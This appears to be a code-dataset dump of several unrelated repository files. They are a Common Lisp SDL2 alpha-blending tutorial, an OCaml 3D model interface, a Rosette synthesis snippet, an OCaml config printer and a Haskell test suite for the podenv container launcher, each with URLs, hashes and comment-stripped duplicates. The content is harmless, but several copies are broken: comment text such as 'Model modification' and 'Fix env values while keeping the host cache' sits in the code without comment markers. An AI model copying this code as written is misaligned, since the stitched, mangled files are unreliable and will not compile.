(:import-from :sdl2-tutorial-utils :asset-pathname))
(in-package #:sdl2-tutorial-13-alpha-blending)
(defparameter *screen-width* 640)
(defparameter *screen-height* 480)
(defclass tex ()
((renderer
:initarg :renderer
:initform (error "Must supply a renderer"))
(width
:accessor tex-width
:initform 0 )
(height
:accessor tex-height
:initform 0)
(texture
:accessor tex-texture
:initform nil)))
(defun load-texture-from-file (renderer filename)
(let ((tex (make-instance 'tex :renderer renderer)))
(with-slots (renderer texture width height) tex
(let ((surface (sdl2-image:load-image filename)))
(setf width (sdl2:surface-width surface))
(setf height (sdl2:surface-height surface))
(sdl2:set-color-key surface :true (sdl2:map-rgb (sdl2:surface-format surface)
0 #xFF #xFF))
(setf texture (sdl2:create-texture-from-surface renderer surface))))
tex))
(defun set-color (tex r g b)
(sdl2:set-texture-color-mod (tex-texture tex) r g b))
(defun set-blend-mode (tex blending)
(sdl2:set-texture-blend-mode (tex-texture tex) blending))
(defun set-alpha (tex alpha)
(sdl2:set-texture-alpha-mod (tex-texture tex) alpha))
(defun render (tex x y &key clip)
(with-slots (renderer texture width height) tex
(sdl2:render-copy renderer
texture
:source-rect clip
:dest-rect (sdl2:make-rect x
y
(if clip (sdl2:rect-width clip) width)
(if clip (sdl2:rect-height clip) height)))))
(defmacro with-window-renderer ((window renderer) &body body)
`(sdl2:with-init (:video)
(sdl2:with-window (,window
:title "SDL2 Tutorial 13"
:w *screen-width*
:h *screen-height*
:flags '(:shown))
(sdl2:with-renderer (,renderer ,window :index -1 :flags '(:accelerated))
,@body))))
(defun clamp (x)
(max 0 (min 255 x)))
(defmacro clamp-incf (x delta)
`(setf ,x (clamp (+ ,x ,delta))))
(defmacro clamp-decf (x delta)
`(setf ,x (clamp (- ,x ,delta))))
(defun run ()
(with-window-renderer (window renderer)
(sdl2-image:init '(:png))
(let ((bg-texture (load-texture-from-file renderer (asset-pathname "assets/13/fadein.png")))
(modulated-texture (load-texture-from-file renderer (asset-pathname "assets/13/fadeout.png")))
(alpha 255)
(delta 32))
(set-blend-mode modulated-texture :blend)
(sdl2:with-event-loop (:method :poll)
(:quit () t)
(:keydown (:keysym keysym)
(case (sdl2:scancode keysym)
(:scancode-w (clamp-incf alpha delta))
(:scancode-s (clamp-decf alpha delta))))
(:idle ()
(sdl2:set-render-draw-color renderer #xFF #xFF #xFF #xFF)
(sdl2:render-clear renderer)
(render bg-texture 0 0)
(set-alpha modulated-texture alpha)
(render modulated-texture 0 0)
(sdl2:render-present renderer))))))
| null | https://raw.githubusercontent.com/TatriX/cl-sdl2-tutorial/ac3613160df0120c4b12de6f7989add0e81c9e63/13-alpha-blending.lisp | lisp | (defpackage #:sdl2-tutorial-13-alpha-blending
(:use :cl)
(:export :run)
(:import-from :sdl2-tutorial-utils :asset-pathname))
(in-package #:sdl2-tutorial-13-alpha-blending)
(defparameter *screen-width* 640)
(defparameter *screen-height* 480)
(defclass tex ()
((renderer
:initarg :renderer
:initform (error "Must supply a renderer"))
(width
:accessor tex-width
:initform 0 )
(height
:accessor tex-height
:initform 0)
(texture
:accessor tex-texture
:initform nil)))
(defun load-texture-from-file (renderer filename)
(let ((tex (make-instance 'tex :renderer renderer)))
(with-slots (renderer texture width height) tex
(let ((surface (sdl2-image:load-image filename)))
(setf width (sdl2:surface-width surface))
(setf height (sdl2:surface-height surface))
(sdl2:set-color-key surface :true (sdl2:map-rgb (sdl2:surface-format surface)
0 #xFF #xFF))
(setf texture (sdl2:create-texture-from-surface renderer surface))))
tex))
(defun set-color (tex r g b)
(sdl2:set-texture-color-mod (tex-texture tex) r g b))
(defun set-blend-mode (tex blending)
(sdl2:set-texture-blend-mode (tex-texture tex) blending))
(defun set-alpha (tex alpha)
(sdl2:set-texture-alpha-mod (tex-texture tex) alpha))
(defun render (tex x y &key clip)
(with-slots (renderer texture width height) tex
(sdl2:render-copy renderer
texture
:source-rect clip
:dest-rect (sdl2:make-rect x
y
(if clip (sdl2:rect-width clip) width)
(if clip (sdl2:rect-height clip) height)))))
(defmacro with-window-renderer ((window renderer) &body body)
`(sdl2:with-init (:video)
(sdl2:with-window (,window
:title "SDL2 Tutorial 13"
:w *screen-width*
:h *screen-height*
:flags '(:shown))
(sdl2:with-renderer (,renderer ,window :index -1 :flags '(:accelerated))
,@body))))
(defun clamp (x)
(max 0 (min 255 x)))
(defmacro clamp-incf (x delta)
`(setf ,x (clamp (+ ,x ,delta))))
(defmacro clamp-decf (x delta)
`(setf ,x (clamp (- ,x ,delta))))
(defun run ()
(with-window-renderer (window renderer)
(sdl2-image:init '(:png))
(let ((bg-texture (load-texture-from-file renderer (asset-pathname "assets/13/fadein.png")))
(modulated-texture (load-texture-from-file renderer (asset-pathname "assets/13/fadeout.png")))
(alpha 255)
(delta 32))
(set-blend-mode modulated-texture :blend)
(sdl2:with-event-loop (:method :poll)
(:quit () t)
(:keydown (:keysym keysym)
(case (sdl2:scancode keysym)
(:scancode-w (clamp-incf alpha delta))
(:scancode-s (clamp-decf alpha delta))))
(:idle ()
(sdl2:set-render-draw-color renderer #xFF #xFF #xFF #xFF)
(sdl2:render-clear renderer)
(render bg-texture 0 0)
(set-alpha modulated-texture alpha)
(render modulated-texture 0 0)
(sdl2:render-present renderer))))))
| |
3ea7ef51bda9790f309608ab20d15406b83f6608481ab3a8a6853483f937eb79 | ogaml/ogaml | model.mli |
module Vertex : sig
type t
val create : position:OgamlMath.Vector3f.t ->
?normal:OgamlMath.Vector3f.t ->
?uv:OgamlMath.Vector2f.t ->
?color:Color.t -> unit -> t
val position : t -> OgamlMath.Vector3f.t
val normal : t -> OgamlMath.Vector3f.t option
val uv : t -> OgamlMath.Vector2f.t option
val color : t -> Color.t option
end
module Face : sig
type t
val create : Vertex.t -> Vertex.t -> Vertex.t -> t
val quad : Vertex.t -> Vertex.t -> Vertex.t -> Vertex.t -> (t * t)
val vertices : t -> (Vertex.t * Vertex.t * Vertex.t)
val paint : t -> Color.t -> t
val normal : t -> OgamlMath.Vector3f.t
end
exception Error of string
type t
(* Creation *)
val empty : t
val from_obj : string -> t
val cube : OgamlMath.Vector3f.t -> OgamlMath.Vector3f.t -> t
(* Transformation *)
val transform : t -> OgamlMath.Matrix3D.t -> t
val scale : t -> OgamlMath.Vector3f.t -> t
val translate : t -> OgamlMath.Vector3f.t -> t
val rotate : t -> OgamlMath.Quaternion.t -> t
Model modification
val add_face : t -> Face.t -> t
val paint : t -> Color.t -> t
val merge : t -> t -> t
val compute_normals : ?smooth:bool -> t -> t
val simplify : t -> t
val source : t -> ?index_source:IndexArray.Source.t
-> vertex_source:VertexArray.SimpleVertex.T.s VertexArray.VertexSource.t
-> unit -> unit
(* Iterators *)
val iter : t -> (Face.t -> unit) -> unit
val fold : t -> ('a -> Face.t -> 'a) -> 'a -> 'a
val map : t -> (Face.t -> Face.t) -> t
| null | https://raw.githubusercontent.com/ogaml/ogaml/5e74597521abf7ba2833a9247e55780eabfbab78/src/graphics/model/model.mli | ocaml | Creation
Transformation
Iterators |
module Vertex : sig
type t
val create : position:OgamlMath.Vector3f.t ->
?normal:OgamlMath.Vector3f.t ->
?uv:OgamlMath.Vector2f.t ->
?color:Color.t -> unit -> t
val position : t -> OgamlMath.Vector3f.t
val normal : t -> OgamlMath.Vector3f.t option
val uv : t -> OgamlMath.Vector2f.t option
val color : t -> Color.t option
end
module Face : sig
type t
val create : Vertex.t -> Vertex.t -> Vertex.t -> t
val quad : Vertex.t -> Vertex.t -> Vertex.t -> Vertex.t -> (t * t)
val vertices : t -> (Vertex.t * Vertex.t * Vertex.t)
val paint : t -> Color.t -> t
val normal : t -> OgamlMath.Vector3f.t
end
exception Error of string
type t
val empty : t
val from_obj : string -> t
val cube : OgamlMath.Vector3f.t -> OgamlMath.Vector3f.t -> t
val transform : t -> OgamlMath.Matrix3D.t -> t
val scale : t -> OgamlMath.Vector3f.t -> t
val translate : t -> OgamlMath.Vector3f.t -> t
val rotate : t -> OgamlMath.Quaternion.t -> t
Model modification
val add_face : t -> Face.t -> t
val paint : t -> Color.t -> t
val merge : t -> t -> t
val compute_normals : ?smooth:bool -> t -> t
val simplify : t -> t
val source : t -> ?index_source:IndexArray.Source.t
-> vertex_source:VertexArray.SimpleVertex.T.s VertexArray.VertexSource.t
-> unit -> unit
val iter : t -> (Face.t -> unit) -> unit
val fold : t -> ('a -> Face.t -> 'a) -> 'a -> 'a
val map : t -> (Face.t -> Face.t) -> t
|
54d1b8779c04118feb0c58bd8342f7efd98778c5bdb8bdf2621ddb71b5e66b62 | MaskRay/99-problems-ocaml | 28.ml | let lsort = List.sort (fun a b -> compare (List.length a) (List.length b))
| null | https://raw.githubusercontent.com/MaskRay/99-problems-ocaml/652604f13ba7a73eee06d359b4db549b49ec9bb3/21-30/28.ml | ocaml | let lsort = List.sort (fun a b -> compare (List.length a) (List.length b))
| |
67e569e754dd2fae2ffec5a2c0ccae1644927be5fc49b10ca0bdfc04f6214a61 | uw-unsat/leanette-popl22-artifact | ex2.rkt | #lang rosette
(require "lang.rkt")
(define (ex2)
(synthesize-program
(lambda (grid)
(begin
(grid-set! grid (point 0 0) 'a)
(grid-set! grid (point 0 2) 'b)))
(lambda (grid) (and (equal? 'a (grid-ref grid (point 4 2)))
(equal? 'b (grid-ref grid (point 0 0)))))))
(time (ex2))
| null | https://raw.githubusercontent.com/uw-unsat/leanette-popl22-artifact/80fea2519e61b45a283fbf7903acdf6d5528dbe7/rosette-benchmarks-4/fluidics/ex2.rkt | racket | #lang rosette
(require "lang.rkt")
(define (ex2)
(synthesize-program
(lambda (grid)
(begin
(grid-set! grid (point 0 0) 'a)
(grid-set! grid (point 0 2) 'b)))
(lambda (grid) (and (equal? 'a (grid-ref grid (point 4 2)))
(equal? 'b (grid-ref grid (point 0 0)))))))
(time (ex2))
| |
4330e53a4d3176e2129d02080373164100bb7dfe37a6bce2ba172107b0b25ff7 | ocaml/opam | print_config.ml | #directory "+compiler-libs";;
#load "ocamlcommon.cma";;
set_binary_mode_out stdout true;;
match List.tl (Array.to_list Sys.argv) with
| ["dll"] -> print_endline Config.ext_dll
| ["obj"] -> print_endline Config.ext_obj
| ["lib"] -> print_endline Config.ext_lib
| ["arch"] -> print_endline Config.architecture
| ["ccomp_type"] -> print_endline Config.ccomp_type
| ["system"] -> print_endline Config.system
| ["os_type"] -> print_endline Sys.os_type
| _ -> prerr_endline "print_config.ml: wrong usage"; exit 2
| null | https://raw.githubusercontent.com/ocaml/opam/074df6b6d87d4114116ea41311892b342cfad3de/shell/print_config.ml | ocaml | #directory "+compiler-libs";;
#load "ocamlcommon.cma";;
set_binary_mode_out stdout true;;
match List.tl (Array.to_list Sys.argv) with
| ["dll"] -> print_endline Config.ext_dll
| ["obj"] -> print_endline Config.ext_obj
| ["lib"] -> print_endline Config.ext_lib
| ["arch"] -> print_endline Config.architecture
| ["ccomp_type"] -> print_endline Config.ccomp_type
| ["system"] -> print_endline Config.system
| ["os_type"] -> print_endline Sys.os_type
| _ -> prerr_endline "print_config.ml: wrong usage"; exit 2
| |
d808c8d3973c33aca4c1619de8267e5af9f348f3b7b1c04bfa81747db69afe16 | podenv/podenv | Spec.hs | # LANGUAGE ImportQualifiedPost #
{-# LANGUAGE OverloadedStrings #-}
# LANGUAGE NoImplicitPrelude #
module Main where
import Data.Text qualified as Text
import Data.Text.IO qualified as Text
import Podenv hiding (loadConfig)
import Podenv.Capability (AppMode (..))
import Podenv.Capability qualified
import Podenv.Config
import Podenv.Context
import Podenv.Dhall
import Podenv.Env
import Podenv.Image
import Podenv.Main hiding (main)
import Podenv.Prelude
import Podenv.Runtime (ExecMode (..))
import Podenv.Runtime qualified
import System.Environment (setEnv)
import Test.Hspec
main :: IO ()
main = mockEnv >> doLoadConfig >>= hspec . spec
where
doLoadConfig = do
testConfig <- Podenv.Config.loadConfig (Just "./test/config.dhall")
goldenConfig <- Podenv.Config.loadConfig (Just "./test/golden.dhall")
pure (testConfig, goldenConfig)
Fix env values while keeping the host cache for dhall
mockEnv = do
curHome <- getEnv "HOME"
setEnv "XDG_CACHE_HOME" (curHome <> "/.cache")
setEnv "NIX_SSL_CERT_FILE" "/etc/hosts"
spec :: (Config, Config) -> Spec
spec (config, goldenConfig) = describe "unit tests" $ do
describe "config" $ do
let loadTest code expected = do
config' <- Podenv.Config.unConfig <$> loadConfig' code
map fst config' `shouldBe` expected
it "load simple" $ loadTest "env" [""]
it "load collection" $ loadTest "{ a = env, b = env}" ["a", "b"]
it "load nested" $ loadTest "{ a = { b = env, c = env}, d = env}" ["a.b", "a.c", "d"]
it "load weak" $ loadTest "{ image = { runtime.image = \"ubi\" }, nix = { runtime.nix = \"n\" } }" ["image", "nix"]
describe "golden" $ do
let mkGoldenConfig :: Maybe Config -> [String] -> IO Text
mkGoldenConfig configM args = do
cli <- usage args
cfg <- maybe (loadConfig (configExpr cli)) pure configM
(ar, mode, gl, run) <- cliConfigLoad "/volumes" testEnv cfg cli
ctx <- Podenv.Runtime.appToContext run mode ar
mappend ("==== " <> show args <> "\n") . Text.replace " --" "\n --"
<$> runReaderT (Podenv.Runtime.showCmd run Foreground ctx) gl
mkGolden = mkGoldenConfig (Just goldenConfig)
writeGolden :: [[String]] -> [[String]] -> IO ()
writeGolden xs ys = do
content <- Text.unlines <$> traverse mkGolden xs
content2 <- Text.unlines <$> traverse (mkGoldenConfig Nothing) ys
current <- Text.readFile "test/golden.txt"
let new =
-- work around typed-process display bug
Text.replace "--detach-keys -t" "--detach-keys \"\" -t"
. Text.unlines
$ [ show $ map fst (unConfig goldenConfig),
content,
content2
]
when (current /= new) $ do
Text.writeFile "test/golden.txt" new
putTextLn "Checkout `git diff`"
exitFailure
it "update golden.txt" $ do
writeGolden
[ ["legacy.vpn"],
["legacy.web"],
["corp.vpn"],
["corp.bridge"],
["--root", "--name", "ubi", "ubi"],
["--root", "--name", "ubi", "--namespace", "testns", "ubi"],
["--headless", "./test/headless.dhall", "firefox"],
["--network", "container:sway.vnc", "vnc-viewer", "localhost"],
["podenv"]
]
[ -- selector is removed from arg because it match the single app selector
["--config", "{env = {runtime.image = \"ubi8\" }}", "env", "id"],
-- the single app is automatically selected
["--config", "{env = {runtime.image = \"ubi8\" }}", "id"],
-- image selector
["image:ubi8"],
-- nix selector
["nix:test"],
-- run with name
["--name", "test", "image:ubi8"],
-- run net default
["--config", "{ runtime.image = \"ubi8\", capabilities.network = True }"],
-- run no-network
["--no-network", "--config", "{ runtime.image = \"ubi8\", capabilities.network = True }"],
-- run net private
["--network", "private", "image:ubi8"],
-- run net host
["--network", "host", "image:ubi8"],
-- run shared net
["--network", "vpn", "image:ubi8"],
wayland disable selinux
["--wayland", "image:ubi8"],
-- hostfile are substituted
["--hostfile", "image:ubi8", "cat", "/etc/hosts", "/proc/cmdline"],
shell override hostfile
["--shell", "--hostfile", "--terminal", "image:ubi8", "vi", "/etc/hosts"],
["--hostfile", "--terminal", "image:ubi8", "vi", "/etc/hosts"],
-- many volumes
["--volume", "/home/data:/tmp/data", "--volume", "/tmp", "--volume", "/old:/tmp/data", "image:ubi8"],
-- name override keep image
["--name", "tmp", "--config", "{ name = \"firefox\", runtime.image = \"localhost/firefox\" }"],
-- bwrap test
["--shell", "rootfs:/srv"]
]
describe "builder config" $ do
it "load firefox" $ do
(_, baseApp) <- mayFail $ Podenv.Config.select config ["firefox"]
let be = Podenv.Runtime.createLocalhostRunEnv testEnv
Text.take 34 (Podenv.Runtime.showBuildInfo be (baseApp ^. arApplication . appRuntime)) `shouldBe` "# Containerfile localhost/3c922bca"
it "load nixify" $ do
(_, baseApp) <- mayFail $ Podenv.Config.select config ["nixify", "firefox", "about:blank"]
let be = Podenv.Runtime.createLocalhostRunEnv testEnv
Text.take 34 (Podenv.Runtime.showBuildInfo be (baseApp ^. arApplication . appRuntime)) `shouldBe` "# Containerfile localhost/3c922bca"
it "override nixpkgs when necessary" $ do
let mkApp installables' pin =
Podenv.Config.defaultApp (Podenv.Dhall.Nix (Podenv.Dhall.Flakes Nothing installables' pin))
& (appName .~ "test")
checkCommand test app expected = do
ctx <- runPrepare (Regular []) testEnv (defaultAppRes app)
(ctx ^. ctxCommand) `test` expected
commandShouldContain = checkCommand shouldContain
commandShouldNotContain = checkCommand shouldNotContain
mkApp ["nixpkgs#hello"] (Just "nixpkgs/42") `commandShouldContain` ["--override-input", "nixpkgs"]
mkApp ["nixpkgs/42#hello"] (Just "nixpkgs/42") `commandShouldNotContain` ["--override-input", "nixpkgs"]
mkApp ["nixpkgs/42#hello", "nixGL"] (Just "nixpkgs/42") `commandShouldContain` ["--override-input", "nixpkgs"]
describe "cli parser" $ do
it "pass command args" $ do
cli <- Podenv.Main.usage ["--name", "test", "image:ubi8", "ls", "-la"]
Podenv.Main.cliExtraArgs cli `shouldBe` ["ls", "-la"]
it "handle separator" $ do
cli <- Podenv.Main.usage ["--name", "test", "image:ubi8", "--", "ls", "-la"]
Podenv.Main.cliExtraArgs cli `shouldBe` ["ls", "-la"]
describe "cli with single config" $ do
it "select app" $ cliTest "env" [] "env"
it "add args" $ cliTest "env" ["ls"] "env // { command = [\"ls\"]}"
it "add --arg" $ cliTest "env" ["--", "--arg"] "env // { command = [\"--arg\"]}"
it "set cap" $ cliTest "env" ["--wayland"] (addCap "env" "wayland = True")
it "unset cap" $ cliTest (addCap "env" "wayland = True") ["--no-wayland"] "env"
it "set volume" $ cliTest "env" ["--volume", "/tmp/test"] "env // { volumes = [\"/tmp/test\"]}"
it "one args" $ cliTest "\\(a : Text) -> env // { description = Some a }" ["a"] "env // { description = Some \"a\"}"
it "two args" $
cliTest
"\\(a : Text) -> \\(b : Text) -> env // { description = Some (a ++ b) }"
["a", "b"]
"env // { description = Some \"ab\"}"
describe "nix test" $ do
it "nix run without args" $ nixTest "{ runtime.nix = \"test\"}" [] ["run", "test"]
it "nix run with args" $
nixTest
"{env, test = { runtime.nix = \"test\"}}"
["test", "--help"]
["run", "test", "--", "--help"]
it "nix run with shell" $
nixTest
"{env, test = { runtime.nix = \"test\", command = [\"cmd\"]}}"
["test", "--help"]
["shell", "test", "--command", "cmd", "--help"]
describe "podman ctx" $ do
let defRun xs = ["run", "--rm"] <> xs <> ["--label", "podenv.selector=unknown", defImg]
let podmanTest code expected = do
ar <- loadOne (addCap code "network = True, rw = True")
ctx <- runPrepare (Regular []) testEnv ar
Podenv.Runtime.podmanRunArgs defRe fg ctx (getImg ar) `shouldBe` expected
it "run simple" $ podmanTest "env" (defRun [])
it "run simple root" $
podmanTest
"env // { capabilities.root = True }"
(defRun ["--user", "0", "--workdir", "/root", "--env", "HOME=/root", "--volume", "/data/podenv-home:/root"])
it "run syscaps" $
podmanTest
"env // { syscaps = [\"NET_ADMIN\"] }"
(defRun ["--cap-add", "CAP_NET_ADMIN"])
it "run hostdir" $
podmanTest
"env // { volumes = [\"/tmp/test\"]}"
(defRun ["--security-opt", "label=disable", "--volume", "/tmp/test:/tmp/test"])
it "run volumes" $
podmanTest
"env // { volumes = [\"nix-store:/nix\"]}"
(defRun ["--volume", "/data/nix-store:/nix"])
it "run home volumes" $
podmanTest
"env // { volumes = [\"~/src:/data\"]}"
(defRun ["--security-opt", "label=disable", "--volume", "/home/user/src:/data"])
it "run many volumes" $
podmanTest
"env // { volumes = [\"/home/data:/tmp/data\", \"/tmp\", \"/home/old-data:/tmp/data\"]}"
(defRun ["--security-opt", "label=disable", "--volume", "/tmp:/tmp", "--volume", "/home/data:/tmp/data"])
where
defImg = "ubi8"
defRe = Podenv.Runtime.defaultGlobalEnv "/data"
runPrepare mode env app = runAppEnv env app $ Podenv.Capability.prepare mode
testEnv =
AppEnv
{ _envHostXdgRunDir = Just "/run/user/1000",
_envHostWaylandSocket = Just (SocketName "wayland-0"),
_envHostHomeDir = Just "/home/user",
_envHostCwd = "/usr/src/podenv",
_envHostUid = 1000,
_envAppHomeDir = Nothing,
_envHostDisplay = ":0",
_envHostSSHAgent = Nothing,
_envIsNVIDIAEnabled = pure False,
_envGetAppHomeDir = \app -> pure $ case app ^. Podenv.Dhall.appRuntime of
Podenv.Dhall.Nix _ -> Just "/home/user"
Podenv.Dhall.Container cb -> toString <$> cb ^. cbImage_home
_ -> Nothing,
_envGetVideoDevices = pure [],
_envGetCertLocation = pure $ Just "/etc/ca"
}
getImg app = case app ^. Podenv.Dhall.arApplication . Podenv.Dhall.appRuntime of
Podenv.Dhall.Image image -> ImageName image
_ -> error "Not podman"
fg = Foreground
getApp code args = do
cli <- Podenv.Main.usage args
cfg <- loadConfig' code
(app, mode, _, _) <- Podenv.Main.cliConfigLoad "/volumes" testEnv cfg cli
runPrepare mode (testEnv & envAppHomeDir ?~ "/home") app
cliTest :: Text -> [String] -> Text -> IO ()
cliTest gotCode args expectedCode = do
got <- getApp gotCode args
expected <- getApp expectedCode []
let removeSelector = ctxLabels .~ mempty
(got & removeSelector) `shouldBe` (expected & removeSelector)
nixTest code args expectedCommand = do
ctx <- getApp code args
drop 3 (ctx ^. ctxCommand) `shouldBe` expectedCommand
addCap code capCode =
"( " <> code <> " // { capabilities = (" <> code <> ").capabilities // {" <> capCode <> "}})"
mkConfig code =
unlines
[ "let Podenv = env:PODENV",
"let Nix = Podenv.Nix",
"let def = { capabilities = {=}, runtime = Podenv.Image \"ubi8\" }",
"let env = def in ",
code
]
loadConfig' code = Podenv.Config.loadConfig (Just . mkConfig $ code)
loadOne code = do
config' <- loadConfig' code
pure $ case Podenv.Config.unConfig config' of
[(_, Podenv.Config.LitApp x)] -> defaultAppRes (Podenv.Config.unRecord x)
_ -> error "Expected a single app"
| null | https://raw.githubusercontent.com/podenv/podenv/9f5d2aec7a7af8b9e68b6dbb1716753e62b89991/test/Spec.hs | haskell | # LANGUAGE OverloadedStrings #
work around typed-process display bug
selector is removed from arg because it match the single app selector
the single app is automatically selected
image selector
nix selector
run with name
run net default
run no-network
run net private
run net host
run shared net
hostfile are substituted
many volumes
name override keep image
bwrap test
arg\"]}" | # LANGUAGE ImportQualifiedPost #
# LANGUAGE NoImplicitPrelude #
module Main where
import Data.Text qualified as Text
import Data.Text.IO qualified as Text
import Podenv hiding (loadConfig)
import Podenv.Capability (AppMode (..))
import Podenv.Capability qualified
import Podenv.Config
import Podenv.Context
import Podenv.Dhall
import Podenv.Env
import Podenv.Image
import Podenv.Main hiding (main)
import Podenv.Prelude
import Podenv.Runtime (ExecMode (..))
import Podenv.Runtime qualified
import System.Environment (setEnv)
import Test.Hspec
main :: IO ()
main = mockEnv >> doLoadConfig >>= hspec . spec
where
doLoadConfig = do
testConfig <- Podenv.Config.loadConfig (Just "./test/config.dhall")
goldenConfig <- Podenv.Config.loadConfig (Just "./test/golden.dhall")
pure (testConfig, goldenConfig)
Fix env values while keeping the host cache for dhall
mockEnv = do
curHome <- getEnv "HOME"
setEnv "XDG_CACHE_HOME" (curHome <> "/.cache")
setEnv "NIX_SSL_CERT_FILE" "/etc/hosts"
spec :: (Config, Config) -> Spec
spec (config, goldenConfig) = describe "unit tests" $ do
describe "config" $ do
let loadTest code expected = do
config' <- Podenv.Config.unConfig <$> loadConfig' code
map fst config' `shouldBe` expected
it "load simple" $ loadTest "env" [""]
it "load collection" $ loadTest "{ a = env, b = env}" ["a", "b"]
it "load nested" $ loadTest "{ a = { b = env, c = env}, d = env}" ["a.b", "a.c", "d"]
it "load weak" $ loadTest "{ image = { runtime.image = \"ubi\" }, nix = { runtime.nix = \"n\" } }" ["image", "nix"]
describe "golden" $ do
let mkGoldenConfig :: Maybe Config -> [String] -> IO Text
mkGoldenConfig configM args = do
cli <- usage args
cfg <- maybe (loadConfig (configExpr cli)) pure configM
(ar, mode, gl, run) <- cliConfigLoad "/volumes" testEnv cfg cli
ctx <- Podenv.Runtime.appToContext run mode ar
mappend ("==== " <> show args <> "\n") . Text.replace " --" "\n --"
<$> runReaderT (Podenv.Runtime.showCmd run Foreground ctx) gl
mkGolden = mkGoldenConfig (Just goldenConfig)
writeGolden :: [[String]] -> [[String]] -> IO ()
writeGolden xs ys = do
content <- Text.unlines <$> traverse mkGolden xs
content2 <- Text.unlines <$> traverse (mkGoldenConfig Nothing) ys
current <- Text.readFile "test/golden.txt"
let new =
Text.replace "--detach-keys -t" "--detach-keys \"\" -t"
. Text.unlines
$ [ show $ map fst (unConfig goldenConfig),
content,
content2
]
when (current /= new) $ do
Text.writeFile "test/golden.txt" new
putTextLn "Checkout `git diff`"
exitFailure
it "update golden.txt" $ do
writeGolden
[ ["legacy.vpn"],
["legacy.web"],
["corp.vpn"],
["corp.bridge"],
["--root", "--name", "ubi", "ubi"],
["--root", "--name", "ubi", "--namespace", "testns", "ubi"],
["--headless", "./test/headless.dhall", "firefox"],
["--network", "container:sway.vnc", "vnc-viewer", "localhost"],
["podenv"]
]
["--config", "{env = {runtime.image = \"ubi8\" }}", "env", "id"],
["--config", "{env = {runtime.image = \"ubi8\" }}", "id"],
["image:ubi8"],
["nix:test"],
["--name", "test", "image:ubi8"],
["--config", "{ runtime.image = \"ubi8\", capabilities.network = True }"],
["--no-network", "--config", "{ runtime.image = \"ubi8\", capabilities.network = True }"],
["--network", "private", "image:ubi8"],
["--network", "host", "image:ubi8"],
["--network", "vpn", "image:ubi8"],
wayland disable selinux
["--wayland", "image:ubi8"],
["--hostfile", "image:ubi8", "cat", "/etc/hosts", "/proc/cmdline"],
shell override hostfile
["--shell", "--hostfile", "--terminal", "image:ubi8", "vi", "/etc/hosts"],
["--hostfile", "--terminal", "image:ubi8", "vi", "/etc/hosts"],
["--volume", "/home/data:/tmp/data", "--volume", "/tmp", "--volume", "/old:/tmp/data", "image:ubi8"],
["--name", "tmp", "--config", "{ name = \"firefox\", runtime.image = \"localhost/firefox\" }"],
["--shell", "rootfs:/srv"]
]
describe "builder config" $ do
it "load firefox" $ do
(_, baseApp) <- mayFail $ Podenv.Config.select config ["firefox"]
let be = Podenv.Runtime.createLocalhostRunEnv testEnv
Text.take 34 (Podenv.Runtime.showBuildInfo be (baseApp ^. arApplication . appRuntime)) `shouldBe` "# Containerfile localhost/3c922bca"
it "load nixify" $ do
(_, baseApp) <- mayFail $ Podenv.Config.select config ["nixify", "firefox", "about:blank"]
let be = Podenv.Runtime.createLocalhostRunEnv testEnv
Text.take 34 (Podenv.Runtime.showBuildInfo be (baseApp ^. arApplication . appRuntime)) `shouldBe` "# Containerfile localhost/3c922bca"
it "override nixpkgs when necessary" $ do
let mkApp installables' pin =
Podenv.Config.defaultApp (Podenv.Dhall.Nix (Podenv.Dhall.Flakes Nothing installables' pin))
& (appName .~ "test")
checkCommand test app expected = do
ctx <- runPrepare (Regular []) testEnv (defaultAppRes app)
(ctx ^. ctxCommand) `test` expected
commandShouldContain = checkCommand shouldContain
commandShouldNotContain = checkCommand shouldNotContain
mkApp ["nixpkgs#hello"] (Just "nixpkgs/42") `commandShouldContain` ["--override-input", "nixpkgs"]
mkApp ["nixpkgs/42#hello"] (Just "nixpkgs/42") `commandShouldNotContain` ["--override-input", "nixpkgs"]
mkApp ["nixpkgs/42#hello", "nixGL"] (Just "nixpkgs/42") `commandShouldContain` ["--override-input", "nixpkgs"]
describe "cli parser" $ do
it "pass command args" $ do
cli <- Podenv.Main.usage ["--name", "test", "image:ubi8", "ls", "-la"]
Podenv.Main.cliExtraArgs cli `shouldBe` ["ls", "-la"]
it "handle separator" $ do
cli <- Podenv.Main.usage ["--name", "test", "image:ubi8", "--", "ls", "-la"]
Podenv.Main.cliExtraArgs cli `shouldBe` ["ls", "-la"]
describe "cli with single config" $ do
it "select app" $ cliTest "env" [] "env"
it "add args" $ cliTest "env" ["ls"] "env // { command = [\"ls\"]}"
it "set cap" $ cliTest "env" ["--wayland"] (addCap "env" "wayland = True")
it "unset cap" $ cliTest (addCap "env" "wayland = True") ["--no-wayland"] "env"
it "set volume" $ cliTest "env" ["--volume", "/tmp/test"] "env // { volumes = [\"/tmp/test\"]}"
it "one args" $ cliTest "\\(a : Text) -> env // { description = Some a }" ["a"] "env // { description = Some \"a\"}"
it "two args" $
cliTest
"\\(a : Text) -> \\(b : Text) -> env // { description = Some (a ++ b) }"
["a", "b"]
"env // { description = Some \"ab\"}"
describe "nix test" $ do
it "nix run without args" $ nixTest "{ runtime.nix = \"test\"}" [] ["run", "test"]
it "nix run with args" $
nixTest
"{env, test = { runtime.nix = \"test\"}}"
["test", "--help"]
["run", "test", "--", "--help"]
it "nix run with shell" $
nixTest
"{env, test = { runtime.nix = \"test\", command = [\"cmd\"]}}"
["test", "--help"]
["shell", "test", "--command", "cmd", "--help"]
describe "podman ctx" $ do
let defRun xs = ["run", "--rm"] <> xs <> ["--label", "podenv.selector=unknown", defImg]
let podmanTest code expected = do
ar <- loadOne (addCap code "network = True, rw = True")
ctx <- runPrepare (Regular []) testEnv ar
Podenv.Runtime.podmanRunArgs defRe fg ctx (getImg ar) `shouldBe` expected
it "run simple" $ podmanTest "env" (defRun [])
it "run simple root" $
podmanTest
"env // { capabilities.root = True }"
(defRun ["--user", "0", "--workdir", "/root", "--env", "HOME=/root", "--volume", "/data/podenv-home:/root"])
it "run syscaps" $
podmanTest
"env // { syscaps = [\"NET_ADMIN\"] }"
(defRun ["--cap-add", "CAP_NET_ADMIN"])
it "run hostdir" $
podmanTest
"env // { volumes = [\"/tmp/test\"]}"
(defRun ["--security-opt", "label=disable", "--volume", "/tmp/test:/tmp/test"])
it "run volumes" $
podmanTest
"env // { volumes = [\"nix-store:/nix\"]}"
(defRun ["--volume", "/data/nix-store:/nix"])
it "run home volumes" $
podmanTest
"env // { volumes = [\"~/src:/data\"]}"
(defRun ["--security-opt", "label=disable", "--volume", "/home/user/src:/data"])
it "run many volumes" $
podmanTest
